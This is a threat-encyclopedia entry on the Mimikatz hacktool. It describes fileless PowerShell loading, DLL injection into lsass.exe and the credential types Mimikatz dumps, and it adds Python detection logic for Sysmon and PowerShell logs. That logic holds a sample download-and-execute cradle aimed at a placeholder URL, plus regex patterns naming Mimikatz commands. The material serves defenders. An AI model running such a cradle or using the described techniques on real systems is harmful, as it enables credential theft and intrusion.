
Hacktool:Win32/Mimikatz


First posted on 24 June 2016.
Source: Microsoft

Aliases:

There are no other names known for Hacktool:Win32/Mimikatz.

Explanation:

Installation

A special PowerShell script (Invoke-Mimikatz.ps1) allows PowerShell to perform remote fileless execution of this threat. In essence, fileless execution loads a binary into a process's address space without writing it to the hard disk. Because the binary is loaded directly into memory, it remains invisible to antivirus solutions that only scan files.

In a typical credential harvesting scenario, a malicious hacker runs a PowerShell command that tricks the victim's machine into downloading the script from a malicious server.

Next, the downloaded script uses reflective DLL injection to load and run the threat remotely without storing any files on the disk of the compromised machine.

As a result, the malicious hacker can remotely use the threat to carry out malicious activity such as stealing credentials and certificates and collecting data from the compromised host.
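The fileless loading and LSASS credential dumping described here leave two high-value traces for defenders: a process opening lsass.exe with memory or thread rights (Sysmon Event ID 10) and a PowerShell script block that downloads code straight into memory or invokes Invoke-Mimikatz (PowerShell Event ID 4104). The following detection logic is an added example, not code from the original page or from Microsoft; the event records are constructed samples with hypothetical paths and a placeholder URL.

```python
import re

# Access rights (winnt.h) a credential dumper or DLL injector needs on lsass.exe:
# CREATE_THREAD | VM_OPERATION | VM_READ | VM_WRITE. Status queries (0x0400, 0x1000) set none.
SUSPICIOUS_ACCESS = 0x0002 | 0x0008 | 0x0010 | 0x0020

# Script-block content tied to Invoke-Mimikatz, and the download-and-execute
# cradle shape (a web download fed into IEX/Invoke-Expression).
MIMIKATZ_RE = re.compile(r"Invoke-Mimikatz|sekurlsa::|kerberos::golden", re.I)
CRADLE_RE = re.compile(r"(DownloadString|Invoke-WebRequest)\b.*\b(IEX|Invoke-Expression)\b|\b(IEX|Invoke-Expression)\b.*\b(DownloadString|Invoke-WebRequest)", re.I)

# Constructed sample events (hypothetical values, not from the original page):
# two Sysmon Event ID 10 records and three PowerShell Event ID 4104 records.
SAMPLE_EVENTS = [
    {"id": 10, "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"id": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"id": 4104, "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/im.ps1')"},
    {"id": 4104, "ScriptBlockText": "Invoke-Mimikatz"},
    {"id": 4104, "ScriptBlockText": "Get-Process | Where-Object CPU -gt 100"},
]

def check_lsass_access(event):
    """Sysmon Event ID 10: flag a process opening lsass.exe with memory or thread rights."""
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    if granted & SUSPICIOUS_ACCESS:
        return f"{event['SourceImage']} opened lsass.exe with access 0x{granted:04x}"
    return None

def check_script_block(event):
    """PowerShell Event ID 4104: flag Mimikatz indicators and in-memory download cradles."""
    text = event.get("ScriptBlockText", "")
    if MIMIKATZ_RE.search(text):
        return "script block references Invoke-Mimikatz functionality"
    if CRADLE_RE.search(text):
        return "script block downloads and executes remote code in memory"
    return None

def triage(events):
    """Return (event id, reason) for every event that matches a detection."""
    checks = {10: check_lsass_access, 4104: check_script_block}
    findings = []
    for ev in events:
        reason = checks.get(ev.get("id"), lambda e: None)(ev)
        if reason:
            findings.append((ev["id"], reason))
    return findings
```

In production the lsass.exe check needs an allowlist for legitimate security agents that read LSASS memory, and Script Block Logging must be enabled for 4104 events to exist at all.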

Payload

This threat can:

  • Recover and export Windows passwords in clear text by injecting a DLL into lsass.exe
  • Export security certificates
  • Execute filelessly through PowerShell
  • Inject DLLs into running processes
  • List running system and user processes
  • Obtain all process tokens
  • Impersonate a token
  • List loaded kernel drivers
  • Get a table of all service calls and the corresponding kernel module names
  • Retrieve data about all callback modules that receive notifications for processes, images, threads, registry changes, objects, and file changes
  • Crash the machine (BSOD)
  • Modify privileges
  • Bypass some Group Policy settings
  • Disable some security and event monitoring services
  • Bypass Microsoft AppLocker / Software Restriction Policies
  • Gather critical data about security and instrumentation software running on the host
Recover and export Windows credentials

This threat can dump credentials from LSASS (Windows Local Security Account database), including:
  • NT LAN Manager (NTLM) password hashes
  • LAN Manager password hashes
  • Kerberos password, ekeys, tickets, and PIN
  • TsPkg (password)
  • WDigest (clear-text password)
  • LiveSSP (clear-text password)
  • SSP (clear-text password)
  • DPAPI hashes and keys
It can also:
  • Generate Kerberos Golden Tickets (Kerberos TGT logon token ticket attack)
  • Generate Kerberos Silver Tickets (Kerberos TGS service ticket attack)
  • Export certificates and keys
  • Dump cached credentials
  • Stop event monitoring
  • Patch Terminal Server
  • Bypass basic Group Policy Objects

Last update 24 June 2016
